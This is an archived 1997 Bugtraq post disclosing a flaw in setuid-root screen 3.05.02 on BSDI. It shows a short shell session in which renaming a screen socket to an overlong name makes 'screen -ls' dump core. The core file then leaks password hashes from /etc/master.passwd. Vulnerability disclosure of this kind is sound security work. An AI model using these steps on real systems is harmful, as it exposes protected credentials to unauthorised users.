Bugtraq mailing list archives

screen 3.05.02

From: khelbin () CONNIX COM (Khelbin Sunvold)
Date: Sat, 15 Feb 1997 21:46:54 -0500


THe program under question is /usr/contrib/bin/screen (BSDI).  This is
screen version 3.05.02 and is installed setuid root, as it is "supposed"
to be.  Here is a demonstration:

$ screen

Screen version 3.05.02 (FAU) 19-Aug-93

Copyright (c) 1993 Juergen Weigert, Michael Schroeder
Copyright (c) 1987 Oliver Laumann

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation; either version 2, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with
this program (see the file COPYING); if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.

Send bugreports, fixes, enhancements, t-shirts, money, beer & pizza to
screen () uni-erlangen de (bah.. send them to Bugtraq!)

                        [Press Space or Return to end.]

$ screen

$ cd /tmp/screens/S-khelbin
$ ls
246.ttyp7.comet
$ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\

anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous

$ screen -ls
/tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous:
 connect: Invalid argument
%1     278 Abort - core dumped  screen -ls
$ ls -l
total 176
srwx------  1 khelbin  khelbin       0 Feb 15 21:33 
246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
-rw-r--r--  1 khelbin  khelbin  172032 Feb 15 21:33 core.screen
$ strings core.screen|less


The core.screen file contains unencrypted password strings from
/etc/master.passwd, which of course, should not be readable by me.  I'm
also sure there's a buffer-overflow here but I havn't had as much time as
I would like to to look through the source yet.


 -khelbin / 9x
 email: khelbin () connix com

Current thread:

IRIX: Bug in startmidi, (continued)
- IRIX: Bug in startmidi David Hedley (Feb 09)
  - Re: IRIX: Bug in startmidi Nafees Bin Zafar (Feb 09)
  - Security Advisory: A simple TCP spoofing attack Oliver Friedrichs (Feb 09)
    - Re: Security Advisory: A simple TCP spoofing attack Wietse Venema (Feb 12)
    - buffer overflow in configurable fingerd? M Shariful Anam (Feb 12)
    - Re: buffer overflow in configurable fingerd? Ken Hollis (Feb 12)
    - Security Bulletins Digest Aleph One (Feb 13)
    - Linux NLSPATH buffer overflow solar () IDEAL RU (Feb 13)
    - Re: Linux NLSPATH buffer overflow Alan Cox (Feb 14)
    - CIAC Bulletin H-27: HP-UX vgdisplay Buffer Overrun Vulnerability Aleph One (Feb 15)
    - screen 3.05.02 Khelbin Sunvold (Feb 15)
    - Re: screen 3.05.02 test (Feb 16)
    - Bug in apache httpd 1.1.3 Mihai Ibanescu (Feb 16)
    - Re: Bug in apache httpd 1.1.3 Dean Gaudet (Feb 16)
    - Announce new phf prober release Ray W. Hiltbrand (Feb 17)
    - Re: Announce new phf prober release J. Bouvrie (Feb 17)
    - NT password dictionary attack. Paul Ashton (Feb 18)
    - New CIFS paper up for grabs *Hobbit* (Feb 18)
    - Re: screen 3.05.02 Mr. Cyb (Feb 16)
    - FreeBSD,rlogin and coredumps. Roelof W Temmingh (Feb 16)
    - Re: FreeBSD,rlogin and coredumps. David Greenman (Feb 16)

(Thread continues...)